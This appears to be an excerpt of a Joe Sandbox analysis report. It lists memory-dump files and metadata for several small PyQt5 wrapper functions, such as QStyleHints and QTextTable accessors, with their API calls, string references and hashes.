Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Available@Bool_Document@@FromLongTextUndo
String ID: QTextDocument$isUndoAvailable$isUndoAvailable(self) -> bool
API String ID: 3233674701-1570929721
Opcode ID: 3eec5a65e6f12d4966210fc1ec36b3e1fa3b522991dffa76a97571d6e6a0b1e2
Instruction ID: 70cba2f071df327e1f9e27fd86030f913aa0cd2b6a2f1e39b9930e9265cb5d48
Opcode Fuzzy Hash: 3eec5a65e6f12d4966210fc1ec36b3e1fa3b522991dffa76a97571d6e6a0b1e2
Instruction Fuzzy Hash: B8012C75B08A46C1EB00EF64E8A86AD33A4FB44BA0F954072CA5D43320DF7CDA49C340

Function 00007FFD862A8F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?senderSignalIndex@QObject@@IEBAHXZ.QT5CORE ref: 00007FFD862A8F4B
PyLong_FromLong.PYTHON3 ref: 00007FFD862A8F53

Strings

QRegExpValidator, xrefs: 00007FFD862A8F78
senderSignalIndex, xrefs: 00007FFD862A8F71
senderSignalIndex(self) -> int, xrefs: 00007FFD862A8F65

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?senderFromIndex@LongLong_Object@@Signal
String ID: QRegExpValidator$senderSignalIndex$senderSignalIndex(self) -> int
API String ID: 2462028585-1785507454
Opcode ID: 317e0c08ed92d1c31bd62f0307a171baecb966468670ec34bc78edec7aaea683
Instruction ID: 1cc5ce052c56d9c15ebbe6fc2979769307a8f6d879d3d90659ba2dc0846f783c
Opcode Fuzzy Hash: 317e0c08ed92d1c31bd62f0307a171baecb966468670ec34bc78edec7aaea683
Instruction Fuzzy Hash: 25012875B08B47D2EB00AF64E8A86AC33A8FB44B61F950072CA5D43320DF7DD959C380

Function 00007FFD8624EEE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?doubleProperty@QTextFormat@@QEBANH@Z.QT5GUI ref: 00007FFD8624EF30
PyFloat_FromDouble.PYTHON3 ref: 00007FFD8624EF36

Strings

rightPadding, xrefs: 00007FFD8624EF54
QTextTableCellFormat, xrefs: 00007FFD8624EF5B
rightPadding(self) -> float, xrefs: 00007FFD8624EF48

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
String ID: QTextTableCellFormat$rightPadding$rightPadding(self) -> float
API String ID: 2584946227-4245553153
Opcode ID: 75960fbd8fc89b2db925160686f0d497a394ebd52c4737a8602783b0112d97fd
Instruction ID: 732f70a34309a9b72bd127cbc826198f035b3090dc1a16062a6f0acb7658abfe
Opcode Fuzzy Hash: 75960fbd8fc89b2db925160686f0d497a394ebd52c4737a8602783b0112d97fd
Instruction Fuzzy Hash: 5C011A36B08A86D1EB00AF54E8686AD37A4FF54764F954072CA5D03320DF7CDE4AC340

Function 00007FFD8624AF30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?senderSignalIndex@QObject@@IEBAHXZ.QT5CORE ref: 00007FFD8624AF7B
PyLong_FromLong.PYTHON3 ref: 00007FFD8624AF83

Strings

senderSignalIndex(self) -> int, xrefs: 00007FFD8624AF95
QWindow, xrefs: 00007FFD8624AFA8
senderSignalIndex, xrefs: 00007FFD8624AFA1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?senderFromIndex@LongLong_Object@@Signal
String ID: QWindow$senderSignalIndex$senderSignalIndex(self) -> int
API String ID: 2462028585-3750479878
Opcode ID: 0b00569d9ff31e82f8f05081e8b2e640307fe0b89808b0e28c03915f7f413126
Instruction ID: 81a14db7825f8b80fe77fe5438390dccb10904f9f40adbdda0ce54e04e9ce332
Opcode Fuzzy Hash: 0b00569d9ff31e82f8f05081e8b2e640307fe0b89808b0e28c03915f7f413126
Instruction Fuzzy Hash: 1901DA75B08A47D2EB00AF65E8686AD33A4FB44764F954172CA5D43320DF7DD959C380

Function 00007FFD8628AF20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?touchDoubleTapDistance@QStyleHints@@QEBAHXZ.QT5GUI ref: 00007FFD8628AF6B
PyLong_FromLong.PYTHON3 ref: 00007FFD8628AF73

Strings

touchDoubleTapDistance(self) -> int, xrefs: 00007FFD8628AF85
touchDoubleTapDistance, xrefs: 00007FFD8628AF91
QStyleHints, xrefs: 00007FFD8628AF98

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?touchDistance@DoubleFromHints@@LongLong_Style
String ID: QStyleHints$touchDoubleTapDistance$touchDoubleTapDistance(self) -> int
API String ID: 960937193-1917760923
Opcode ID: 985c355fd1ac99cf45bb7a8d9d7ceb271fb1c3f430732b3b8e4ca803ab951697
Instruction ID: 75be0d640a31a6331964306a43899aa41ffd689a1f673ffa16f9c2a4ef4eaf93
Opcode Fuzzy Hash: 985c355fd1ac99cf45bb7a8d9d7ceb271fb1c3f430732b3b8e4ca803ab951697
Instruction Fuzzy Hash: F9011675B08A8681EB00AF64E8A86AC33A4FB54BA0F954072CA5D47320DF7DDA49C380

Function 00007FFD8625EF90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?rows@QTextTable@@QEBAHXZ.QT5GUI ref: 00007FFD8625EFDB
PyLong_FromLong.PYTHON3 ref: 00007FFD8625EFE3

Strings

rows, xrefs: 00007FFD8625F001
QTextTable, xrefs: 00007FFD8625F008
rows(self) -> int, xrefs: 00007FFD8625EFF5

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?rows@FromLongLong_Table@@Text
String ID: QTextTable$rows$rows(self) -> int
API String ID: 218454496-3979586119
Opcode ID: c7c211755d7babadd74f012fa6b48c01dd0598de2facb058140cbef51a0b90d0
Instruction ID: 5c0aa7704810f7898e94a132464ed7470ccf07a3ce3312ee83c7b3047095e33d
Opcode Fuzzy Hash: c7c211755d7babadd74f012fa6b48c01dd0598de2facb058140cbef51a0b90d0
Instruction Fuzzy Hash: 47012C75B08A46C1EB00AF64F86D6AD33A4FB44764F950072CA4D43320DF7CD949C780

Function 00007FFD86286F80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?keyboardInputInterval@QStyleHints@@QEBAHXZ.QT5GUI ref: 00007FFD86286FCB
PyLong_FromLong.PYTHON3 ref: 00007FFD86286FD3

Strings

keyboardInputInterval, xrefs: 00007FFD86286FF1
keyboardInputInterval(self) -> int, xrefs: 00007FFD86286FE5
QStyleHints, xrefs: 00007FFD86286FF8

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?keyboardFromHints@@InputInterval@LongLong_Style
String ID: QStyleHints$keyboardInputInterval$keyboardInputInterval(self) -> int
API String ID: 567565523-2225722907
Opcode ID: 4293bce668ce2ab5aca3ab321d0a68c48a5dc3c5e2462aee66735b10c4bcd376
Instruction ID: 1e95f8e281d313413ffa7e849ad3903fb83feb7f463d77b616e590b3439d43e3
Opcode Fuzzy Hash: 4293bce668ce2ab5aca3ab321d0a68c48a5dc3c5e2462aee66735b10c4bcd376
Instruction Fuzzy Hash: 7D011A75B08B4681EB009F64E8696AC33A4FB54760F950072CA5D43320DF7DE959C780

Function 00007FFD86240FB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isIdentity@QTransform@@QEBA_NXZ.QT5GUI ref: 00007FFD86240FFB
PyBool_FromLong.PYTHON3 ref: 00007FFD86241004

Strings

isIdentity, xrefs: 00007FFD86241022
QTransform, xrefs: 00007FFD86241029
isIdentity(self) -> bool, xrefs: 00007FFD86241016

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromIdentity@LongTransform@@
String ID: QTransform$isIdentity$isIdentity(self) -> bool
API String ID: 327161132-3281662894
Opcode ID: 494808ea2d571c1db8f88cda4125c3b199e4006d48e4c35bd1f94c34fc705ffb
Instruction ID: ca3fb745e0e7933be345702685f221cc1846d0b32e4dd50cdf67635be2c47546
Opcode Fuzzy Hash: 494808ea2d571c1db8f88cda4125c3b199e4006d48e4c35bd1f94c34fc705ffb
Instruction Fuzzy Hash: 41012835B08E86D1EB00EF64E8A86AD37A5FB54BA1F954072CA5D03720DF7DD959C380

Function 00007FFD86242C60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?lineCount@QTextLayout@@QEBAHXZ.QT5GUI ref: 00007FFD86242CAB
PyLong_FromLong.PYTHON3 ref: 00007FFD86242CB3

Strings

lineCount(self) -> int, xrefs: 00007FFD86242CC5
QTextLayout, xrefs: 00007FFD86242CD8
lineCount, xrefs: 00007FFD86242CD1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?lineCount@FromLayout@@LongLong_Text
String ID: QTextLayout$lineCount$lineCount(self) -> int
API String ID: 327766991-3593662340
Opcode ID: b3cbed0236805f434dbb76d599053ea411070eb8cff5d60cd1048faff260d3c8
Instruction ID: 851396339ac812250ba1cb298d8f19c376662043eec562093920abd05cd7c15d
Opcode Fuzzy Hash: b3cbed0236805f434dbb76d599053ea411070eb8cff5d60cd1048faff260d3c8
Instruction Fuzzy Hash: CD011A75B08A46C1EB009F64E8A96AC33A4FB44B60F954072CA5D43320DF7CD949C380

Function 00007FFD8628ACB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?length@QTextBlock@@QEBAHXZ.QT5GUI ref: 00007FFD8628ACFB
PyLong_FromLong.PYTHON3 ref: 00007FFD8628AD03

Strings

QTextBlock, xrefs: 00007FFD8628AD28
length(self) -> int, xrefs: 00007FFD8628AD15
length, xrefs: 00007FFD8628AD21

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?length@Block@@FromLongLong_Text
String ID: QTextBlock$length$length(self) -> int
API String ID: 4189808640-4094780820
Opcode ID: f309f8652c223de3cc8a84a35d252469c39cb3d8c085e7d52748143d3e355a6c
Instruction ID: cc1cc333bb4e35840b532caa76ebc5dfce7d0c734e75a6b368cabd1acab48290
Opcode Fuzzy Hash: f309f8652c223de3cc8a84a35d252469c39cb3d8c085e7d52748143d3e355a6c
Instruction Fuzzy Hash: 65012875B08B46D1EB00AF64E8A86AC37A4FB44B61F954072CA4D43320DF7CDA8AC380

